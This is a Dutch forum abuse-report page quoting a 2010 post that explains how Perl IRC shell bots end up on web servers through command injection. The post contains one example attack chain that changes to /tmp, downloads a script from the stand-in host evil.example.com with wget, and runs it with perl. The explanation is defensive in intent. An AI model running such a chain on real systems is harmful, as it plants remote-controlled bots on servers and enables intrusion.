Abuse Melding

Je hebt een klacht over de onderstaande posting:

25-11-2010, 17:38 door backeroni

Afhankelijk waar deze bestanden terecht komen is het mogelijk om dat via een command injection te doen. Zowel "dude" als "half.txt" zijn IRC shell bots geschreven in perl. In tegenstelling tot wat de meeste zullen denken heeft de www gebruiker voldoende rechten om deze uit te voeren. Een manier die ik wel eens gezien heb is om, middels een command injection, het volgende uit te laten voeren: cd /tmp ; wget http://evil.example.com/badscript.txt ; perl badscript.txt Zoals ik al zei is het feit dat het commando uberhaupt gegeven kan worden, en niet afgevangen is, het feitelijke lek. Waar dat dan is gegeven haal ik helaas niet uit het bijgevoegde log maar ik betwijfel of dat PHPMyAdmin is.

Beschrijf je klacht (Optioneel):

captcha